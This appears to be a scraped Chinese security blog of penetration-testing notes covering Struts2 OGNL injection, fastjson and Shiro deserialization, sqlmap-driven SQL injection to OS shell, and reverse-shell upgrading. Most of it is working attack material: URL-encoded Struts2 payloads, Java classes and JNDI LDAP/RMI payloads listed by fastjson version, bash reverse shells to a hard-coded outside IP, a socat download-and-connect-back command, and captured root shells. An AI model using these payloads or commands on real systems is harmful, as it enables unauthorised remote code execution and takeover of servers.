go install: no install location for directory outside GOPATH:

参考: https://stackoverflow.com/questions/26134975/go-install-no-install-location-for-directory-outside-gopath

进入容器后就可以直接执行命令,ifconfig:

br-4c7c2091db92: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.24.0.1  netmask 255.255.0.0  broadcast 172.24.255.255
        inet6 fe80::42:b7ff:feb7:f51d  prefixlen 64  scopeid 0x20<link>
        ether 02:42:b7:b7:f5:1d  txqueuelen 0  (Ethernet)
        RX packets 46  bytes 4538 (4.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 65  bytes 4778 (4.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        inet6 fe80::42:94ff:feb9:c3dc  prefixlen 64  scopeid 0x20<link>
        ether 02:42:94:b9:c3:dc  txqueuelen 0  (Ethernet)
        RX packets 1602494  bytes 995390708 (949.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1434833  bytes 872808706 (832.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.185.134  netmask 255.255.240.0  broadcast 172.17.191.255
        inet6 fe80::216:3eff:fe03:a170  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:03:a1:70  txqueuelen 1000  (Ethernet)
        RX packets 6405140  bytes 5419609300 (5.0 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4733596  bytes 1372915223 (1.2 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 20372  bytes 1792815 (1.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20372  bytes 1792815 (1.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

veth382577a: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::b067:b9ff:fece:612b  prefixlen 64  scopeid 0x20<link>
        ether b2:67:b9:ce:61:2b  txqueuelen 0  (Ethernet)
        RX packets 46  bytes 5182 (5.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 83  bytes 6263 (6.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

iptable:

iptables -L
# Warning: iptables-legacy tables present, use iptables-legacy to see them
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
DOCKER-USER  all  --  anywhere             anywhere
DOCKER-ISOLATION-STAGE-1  all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
DOCKER     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
DOCKER     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Chain DOCKER (2 references)
target     prot opt source               destination
ACCEPT     tcp  --  anywhere             172.24.0.2           tcp dpt:http-alt

Chain DOCKER-ISOLATION-STAGE-1 (1 references)
target     prot opt source               destination
DOCKER-ISOLATION-STAGE-2  all  --  anywhere             anywhere
DOCKER-ISOLATION-STAGE-2  all  --  anywhere             anywhere
RETURN     all  --  anywhere             anywhere

Chain DOCKER-USER (1 references)
target     prot opt source               destination
RETURN     all  --  anywhere             anywhere

Chain DOCKER-ISOLATION-STAGE-2 (2 references)
target     prot opt source               destination
DROP       all  --  anywhere             anywhere
DROP       all  --  anywhere             anywhere
RETURN     all  --  anywhere             anywhere

[Read More]

s2-001

struts2-001该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。 例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。

影响版本:Struts 2.0.0 - Struts 2.0.8

payload代码

%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

发送回包回显如下:payload的注入命令whoami下方页面显示回显root,执行成功。

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>S2-001</title>
</head>
<body>
<h2>S2-001 Demo</h2>
<p>link: <a href="https://struts.apache.org/docs/s2-001.html">https://struts.apache.org/docs/s2-001.html</a></p>

			
<form id="login" name="login" onsubmit="return true;" action="/login.action" method="post">
<table class="wwFormTable">
	<tr>
    <td class="tdLabel"><label for="login_username" class="label">username:</label></td>
    <td
><input type="text" name="username" value="asdadas" id="login_username"/>
</td>
</tr>
root

payload1:

%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D

payload2(get shell):

%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ping","dnslog.cn"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash","-c","/bin/bash -i >& /dev/tcp/47.52.233.92/12341 0>& 1"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

--------------------+
--------------------+
以下是使用payload,实测能够十分有效的进行各种poc代码注入,使用url编码效果更佳。
%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash","-c","/bin/bash -i >& /dev/tcp/47.52.233.92/12341 0>& 1"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
nc -lvnp 12341
Listening on 0.0.0.0 12341
Connection received on 120.242.209.224 17321
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@9485ca31e963:/usr/local/tomcat# id
uid=0(root) gid=0(root) groups=0(root)

s2-013

?url=%24%7B%28%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%23d%29%2C%23out.close%28%29%29%7D

struts2-dev-mode

debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29

s2-057

影响版本: <= Struts 2.3.34, Struts 2.5.16

访问http://localhost:8080/${(111+111)}/actionChain1.action

Requst包
GET /$%7B(111+111)%7D/actionChain1.action HTTP/1.1
Host: vuln_s2_ip:8080
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 
  like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/ap
ng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=6567848243F5C10BA42DA6C8222FFC32
Connection: close
+------------------------++------------------------++------------------------+
+------------------------++------------------------++------------------------+

Response包:
HTTP/1.1 302 
Location: /222/register2.action
Content-Length: 0
Date: Wed, 27 May 2020 06:21:06 GMT
Connection: close

我们看到${(111+111)}表达式已经被计算

[Read More]

写在前面,本方法适用于在反弹shell后把shell提升为完全交互式shell,也是自己实战了一段时间后摸索出来的,记一下笔记;

完美的交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
reset
export SHELL=bash
//$ export TERM=xterm-256color

同样的,我在网上也找到另外一种方式:script /dev/null/这样:同理,也可以通过同样的方式获取到交互式shell:

script /dev/null
Ctrl-Z
stty raw -echo
fg
reset

这样我们在终端某个命令时,输入ctrl+c或者ctrl+z就不会直接中断shell。 这里转载搜到信息来进行展示,供大家参考:

stty -echo	#禁止回显,当在键盘上输入时,并不出现在屏幕上
stty echo 	#打开回显
stty raw 	#设置原始输入
stty -raw	#关闭原始输入
bg			#将一个在后台暂停的命令,变成继续执行
fg			#将后台中的命令调至前台继续运行
jobs		#查看当前有多少在后台运行的命令
ctrl+z 		#可以将一个正在前台执行的命令放到后台,并且暂停
clear  		#这个命令将会刷新屏幕,本质上只是让终端显示页向后翻了一页,如果向上滚动屏幕还可以看到之前的操作信息。
reset 		#这个命令将完全刷新终端屏幕,之前的终端输入操作信息将都会被清空

来源:实现交互式shell的几种方式

socat

目标机

把socat上传到目标机器上或者直接下载

$ wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat

vuln_ip:
chmod +x /tmp/socat
./tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:47.52.233.92:4444
--
attack machine
socat file:`tty`,raw,echo=0 tcp-listen:4444

stty行列数:)

有的时候终端写入的命令太长,而终端行列不够长来显示所以会导致命令重叠、错杂,我们可以用下面的方法来让我们用这个shell用的更舒服点;

先看看自己机器上的stty配置信息:

root@ubuntu20-free:~# stty -a
speed 9600 baud; rows 35; columns 148; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc

speed 9600 baud; rows 35; columns 148; line = 0;这一段是我们所需要的信息;

rows 35; columns 148
配置我们的shell如下:
$ stty rows 35 cols 148

其他痛点

有的时候感觉terminal上太多命令了,用着用着会习惯性输入命令clear,然后你们就会看到如下现象:

# clear

TERM environment variable not set.

# set |grep TERM

TERM=dumb

如上,看term的配置信息,最后解决办法如下,设置term为xterm就可以了。

# export TERM=xterm

# set |grep TERM
TERM=xterm
_=TERM

之后就可以随意的clear清除命令辣!

[Read More]

「SQL注入」:SQL-SHELL

May 20, 2020. | By: Bin4xin

sqlmap注入方法


sqlmap -r Desktop/uid.txt --current-user

sqlmap -r Desktop/uid.txt -D aiweb1 --tables

sqlmap -r Desktop/uid.txt -D aiweb1 -T systemUser --columns

sqlmap -r Desktop/uid.txt -D aiweb1 -T systemUser -C id,password,userName

sqlmap -r Desktop/uid.txt --file-read="/etc/passwd"

sql-shell> select load_file('/etc/passwd')

查看数据库信息和系统版本
sql-shell> select @@version
[14:29:22] [INFO] fetching SQL SELECT statement query output: 'select @@version'
select @@version:    'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) \n\tApr  2 2010 15:48:46 \n\tCopyright (c) Microsoft Corporation\n\tStandard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)\n'

验证是否为sa权限
sql-shell> select IS_SRVROLEMEMBER('sysadmin')
[14:30:08] [INFO] fetching SQL SELECT statement query output: 'select IS_SRVROLEMEMBER('sysadmin')'
select IS_SRVROLEMEMBER('sysadmin'):    '1'

判断目标机的MSSQL服务是否存在`xp_cmdshell`扩展存储过程:
sql-shell> select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';
[14:31:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell''
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';:    '1'
只要返回结果不是`0`就说明存在`xp_cmdshell`扩展存储过程。

遇到问题

sql-shell> Exec master..xp_cmdshell 'whoami';
[14:32:58] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

how

sqlmap -r /home/tool/sqlmap-data/wsdl-inject/net-test1.txt –batch –file-read=”C:\Windows\win.ini”

[14:24:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[14:24:08] [ERROR] none of the SQL injection techniques detected can be used to read files from the underlying file system of the back-end Microsoft SQL Server server

?os-shell?

mysql: select password(‘’),concat(‘*‘,sha1(unhex(sha1(‘’)))); sqlmap -d “mysql://root:Hehe123456@192.168.192.120:3306/test” –os-shell

select "hex" into outfile "D:/phpStudy/MySQL/lib/plugin/udf.dll"

CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘udf.dll’;

[Read More]

「fastjson」:浅谈json的反序列化

May 19, 2020. | By: Bin4xin

fastjson指纹特征

访问页面,查看反包是一个指定的json格式的数据。请求包:

GET / HTTP/1.1
Host: underattack-host:8090
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

反包:

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 28
Date: Tue, 19 May 2020 01:05:29 GMT
Connection: close

{
    "age":25,
    "name":"Bob"
}

如上的请求和反包。我们知道了json的格式直接构造参数,给服务器发包看看:

POST / HTTP/1.1
Host: underattack-host:8090
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Length: 26

{"name":"hello", "age":20}

反包:

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 30
Date: Tue, 19 May 2020 01:06:20 GMT
Connection: close

{
    "age":20,
    "name":"hello"
}

我们看到服务器端返回包为我们构造的包。

fastjson 1.2.24 反序列化导致任意命令执行漏洞

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

参考资料:

  • https://www.freebuf.com/vuls/208339.html
  • http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/

首先编译并上传命令执行代码

## cat dnslog.java

import java.lang.Runtime;
import java.lang.Process;

public class dnslog {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/sh", "-c", "ping user.`whoami`.c08aqu.dnslog.cn"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译:javac dnslog.java。生成class文件;然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并指定受害机器访问9999端口后,去加载远程服务器的类dnslog.class,而class文件就是执行command。

git clone https://github.com/mbechler/marshalsec.git

cd marshalsec

mvn clean package -DskipTests ##看到BUILD SUCCESS后进入target

cd target

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "https://www.chihou.pro/##dnslog" 9999

* Opening JRMP listener on 9999

开启监听。向靶场服务器发送Payload,带上RMI的地址:

POST数据:
{
    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"rmi://47.52.233.92:9999/dnslog",

        "autoCommit":true
    }
}
----
{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },

    "x":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://47.52.233.92:9999/expUseful",
        "autoCommit":true
    }
}

发送完毕后检查RMI服务器的监听记录:

* Opening JRMP listener on 9999
Have connection from /61.133.171.114:11430
Reading message...
Is RMI.lookup call for dnslog 2
Sending remote classloading stub targeting https://www.chihou.pro/dnslog.class
Closing connection

受害机器已经访问了我们的服务器,最后检查是否执行dnslog命令;

user.root.c08aqu.dnslog.cn  61.132.161.12   2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn  61.132.161.5    2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn  61.132.161.12   2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn  61.132.161.5    2020-08-14 15:43:30

可见,ping命令已成功执行;

######## 反弹shell 同样的,直接在poc代码里修改反弹shell的代码即可。

import java.lang.Runtime;
import java.lang.Process;

public class nc {
    static {
    
        try{
        Runtime rt = Runtime.getRuntime();
        String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/47.52.233.92/12341 0>& 1"};
        Process pc = rt.exec(commands);
        pc.waitFor();
        }catch (Exception e) {
        //no
        }
    
    }
}

同理即可获得反弹shell:

## nc -lvnp 12341
Listening on 0.0.0.0 12341
Connection received on 120.242.209.70 3450
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@5a8812147218:/## whoami
whoami
root

dnslog

{"rand1":{"@type":"java.net.InetAddress","val":"http://dnslog"}}

{"rand2":{"@type":"java.net.Inet4Address","val":"http://dnslog"}}

{"rand3":{"@type":"java.net.Inet6Address","val":"http://dnslog"}}

{"rand4":{"@type":"java.net.InetSocketAddress"{"address":,"val":"http://dnslog"}}}

{"rand5":{"@type":"java.net.URL","val":"http://dnslog"}}

一些畸形payload,不过依然可以触发dnslog:
{"rand6":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}
{"@type": "java.lang.AutoCloseable"


{"rand7":Set\[{"@type":"java.net.URL","val":"http://dnslog"}\]}

{"rand8":Set\[{"@type":"java.net.URL","val":"http://dnslog"}

{"rand9":{"@type":"java.net.URL","val":"http://dnslog"}


{"@type": "java.lang.AutoCloseable"



{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true}}

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true}

  • 1.2.41
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://47.52.233.92:9999/expUseful", "autoCommit":true}
// 直接加 [ 是不可以的,因为数组实例化的是Object类型,所以需要将传入的变量设置为数组格式,然后在com.alibaba.fastjson.serializer.ObjectArrayCodec中通过数组对象的getComponentType()可以获得数组元素,即com.sun.rowset.JdbcRowSetImpl对象
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true]}
  • 1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://47.52.233.92:9999/expUseful", "autoCommit":true}
//原来在41版本的[还能用
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true]}
  • 1.2.43
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://47.52.233.92:9999/expUseful"}}
  • 1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://47.52.233.92:9999/expUseful"}}
  • 1.2.47
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true}}}

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://47.52.233.92:9999/expUseful","autoCommit":true}}}

  • 1.2.60
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"ldap://47.52.233.92:9999/expUseful"}
{\"@type\":\"oracle.jdbc.connector.OracleManagedConnectionFactory\",\"xaDataSourceName\":\"rmi://10.10.20.166:1099/ExportObject\"}
{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"ldap://10.10.20.166:1389/ExportObject\"}


{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"}"
  • 1.2.62
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1099/exploit"}
  • 1.2.66
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"
java.util.Properties","UserTransaction":"ldap://47.52.233.92:9999/expUseful"}}
  • RMI

{"@type":"LLcom.sun.rowset.RowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.42
{"@type":"[com.sun.rowset.RowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.25v1.2.43
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties""data_source":"rmi://localhost:1099/Exploit"}} 1.2.25
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://127.0.0.1:1099/Exploit\"}1.2.60
{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.60
{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.61
{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"rmi://localhost:1099/Exploit\"}  1.2.62
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\":{\"UserTransaction\":\"rmi://localhost:1099/Exploit\"}} JtaTransactionConfig

[Read More]

「Shiro」:Apache-shiro框架利用整理

May 18, 2020. | By: Bin4xin

漏洞特征:shiro反序列化的特征:1、在返回包的Set-Cookie的值为「rememberMe=deleteMe」2、Apache Shiro版本<= 1.2.4 现在很多j2ee开发都会采用shiro框架来做一些权限控制,框架的优势是出来了,当然就存在劣势。shiro是我在参加工作后才会慢慢去接触到,从一开始的代审,再到黑盒渗透,再到前一段时间刚结束的HW行动。 第一小结,是我自己在实践中的一些理解和经历,希望能够记录下来;第二小结是在学习中在网上的一些学习过程,当时也记录下来了,故此分为两个小结。

验证

在上面的简述中,可以来进行shiro框架的判断,同时,我们可以进一步对shiro框架是否存在反序列化来进行验证: 用到的是Shiroscan脚本,开源在github上,用法就不多赘述。

python3 shiro_rce.py https://shiro.vuln.ip/login.html "ping x.dnslog.cn"
 ____  _     _          ____                  
/ ___|| |__ (_)_ __ ___/ ___|  ___ __ _ _ __  
\___ \| '_ \| | '__/ _ \___ \ / __/ _` | '_ \ 
 ___) | | | | | | | (_) |__) | (_| (_| | | | |
|____/|_| |_|_|_|  \___/____/ \___\__,_|_| |_|

                           By 斯文

Welcome To Shiro反序列化 RCE ! 
[*]  开始检测模块 Class1:CommonsBeanutils1

然后脚本开始对不同的秘钥进行生成cookie,尝试让机器执行命令。等待脚本在跑的时候或者跑完,看一下dnslog上的dns记录,如果存在记录如下所示,那么就说明存在反序列化漏洞使得机器执行了任意代码,反之则无:

x.dnslog.cn    shiro.vuln.ip 2020-07-02 16:46:35
x.dnslog.cn    shiro.vuln.ip 2020-07-02 16:45:52
x.dnslog.cn    shiro.vuln.ip 2020-07-02 16:45:52
x.dnslog.cn    shiro.vuln.ip 2020-07-02 16:45:52

不服气

当然有的时候用shiroScan扫结束后并没有记录,即不存在漏洞;但是像我,又不死心,于是又在网上折腾找了另外一个能够跑秘钥的探测脚本-_- 作者博客

python shiro_exp.py https://shiro.vuln.ip/login.html
try CipherKey :4AvVhmFLUs0KTA3Kprsdag==
generator payload done.
send payload ok.
checking.....
checking.....
checking.....
checking.....
vulnerable:true url:https://shiro.vuln.ip/login.html    CipherKey:3AvVhmFLUs0KTA3Kprsdag==

当然秘钥对于我们理解shiro反序列化框架也有一定的帮助,shiro的反序列化最初的漏洞来源也是因为秘钥硬编码。

getshell

通过上面的步骤我们就可以对shiro反序列化做一个判定,肯定是存在RCE漏洞,那么来实现我们的最终目的,GET-shell 一般反弹shell的执行代码bash -i >& /dev/tcp/47.52.233.92/11111 0>&1,首先需要把代码进行base64编码,只有经过base64编码后shiro才认得这个命令,通过shiro自己本身的base64解码最终达到执行命令的目的; 转成base64编码->bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny41Mi4yMzMuOTIvMTIzNCAwPiYx}|{base64,-d}|{bash,-i};像我比较偷懒,就直接在脚本上添加反弹shell,这样的好处就是我们不需要在生成poc的脚本里替换cookie,由脚本自动生成的cookie自动去跑,省事很多 来源:我是转换网址:-) 监听端口等待shell回连(我这里的样例是docker环境)

nc -lvvp 11111
Listening on [0.0.0.0] (family 0, port 11111)
Connection from 59.110.152.168 47274 received!
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@6d5a7848dbef:/# id
id
uid=0(root) gid=0(root) groups=0(root)

学习

工具

